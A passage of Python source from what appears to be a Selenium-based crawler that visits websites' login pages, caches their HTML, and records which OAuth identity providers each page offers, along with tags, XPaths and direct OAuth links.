813 | break 814 | if len(urls['login']) == 0: 815 | logger.info('login page not found!') 816 | # Visit the login page to search for the IdPs 817 | elif len(urls['idps']) == 0: 818 | # Note: remove this to search for more IdPs when re-running the script 819 | logger.info(f'Searching for IDPs OAuth links in {len(urls["login"])} pages') 820 | if browser is None: 821 | browser = webdriver.Chrome(options=options) 822 | 823 | ''' 824 | 1. Cycle through the login pages 825 | 2. If the page is already dumped in memory: read from memory 826 | 3. If the page is not in memory: get it from the web and dump it in memory 827 | 4. Get IDPs from the page and add them to the urls['idps'] list if not already present (refer the login page URL in the IDP) 828 | ''' 829 | for login_url in urls['login']: 830 | if os.path.exists(f'html/{SITE}{url_to_filename(login_url)}.html'): 831 | logger.info('page retrieved from file') 832 | with open(f'html/{SITE}{url_to_filename(login_url)}.html', 'r') as f: 833 | html = f.read() 834 | else: 835 | logger.info('page retrieved from the web') 836 | browser.get(login_url) 837 | time.sleep(1.5) 838 | 839 | html = browser.page_source 840 | with open(f'html/{SITE}{url_to_filename(login_url)}.html', 'w') as f: 841 | f.write(html) 842 | 843 | links = get_links(login_url, html, only_internal=False) # !Get also external links 844 | for provider in PROVIDERS: 845 | # First get the login tag and xpath for the provider 846 | tag, xpath = get_oauth_tag(html, provider) 847 | if tag is not None: 848 | if provider not in urls['login'][login_url]: 849 | urls['login'][login_url][provider] = {} 850 | urls['login'][login_url][provider]['tag'] = tag 851 | if not provider in urls['idps']: 852 | urls['idps'].append(provider) 853 | logger.info(f'found {bcolors.OKGREEN}{provider}{bcolors.ENDC} tag') 854 | if xpath is not None: 855 | if provider not in urls['login'][login_url]: 856 | urls['login'][login_url][provider] = {} 857 | urls['login'][login_url][provider]['xpath'] = xpath 858 | if not provider in urls['idps']: 859 | urls['idps'].append(provider) 860 | logger.info(f'found {bcolors.OKGREEN}{provider}{bcolors.ENDC} xpath') 861 | 862 | # Then search if there is also a direct OAuth link for this provider 863 | provider_oauth_link = get_oauth_link(links, provider=provider) 864 | if provider_oauth_link != '': 865 | if provider not in urls['login'][login_url]: 866 | urls['login'][login_url][provider] = {} 867 | urls['login'][login_url][provider]['url'] = provider_oauth_link 868 | if not provider in urls['idps']: 869 | urls['idps'].append(provider) 870 | logger.info(f'found {bcolors.OKGREEN}{provider}{bcolors.ENDC}: {provider_oauth_link}') 871 | else: 872 | # Try with source code links 873 | links = get_source_code_links(browser.current_url, browser.page_source) 874 | provider_oauth_link = get_oauth_link(links, provider=provider) 875 | if provider_oauth_link != '': 876 | if provider not in urls['login'][login_url]: 877 | urls['login'][login_url][provider] = {} 878 | urls['login'][login_url][provider]['url'] = provider_oauth_link 879 | if not provider in urls['idps']: 880 | urls['idps'].append(provider) 881 | logger.info(f'found {bcolors.OKGREEN}{provider}{bcolors.ENDC}: {provider_oauth_link}') 882 | logger.info(f'Website crawled:\n{json.dumps(urls, indent=4)}') 883 | except SystemExit as e: 884 | sys.exit(e) 885 | except (SSLError, NewConnectionError, MaxRetryError, ConnectionError, ReadTimeoutError, ReadTimeout): 886 | logger.error(f'{SITE} timed out') 887 | except KeyboardInterrupt: 888 | logger.debug('KeyboardInterrupt received, exiting...') 889 | sys.exit(1) 890 | except: 891 | logger.error(traceback.format_exc()) 892 | sys.exit(1) 893 | finally: 894 | save_dictionaries(SITE, LOGS) 895 | if browser is not None: 896 | browser.quit() 897 | logger.info(f'All done!') 898 | sys.exit(0) 899 | --------------------------------------------------------------------------------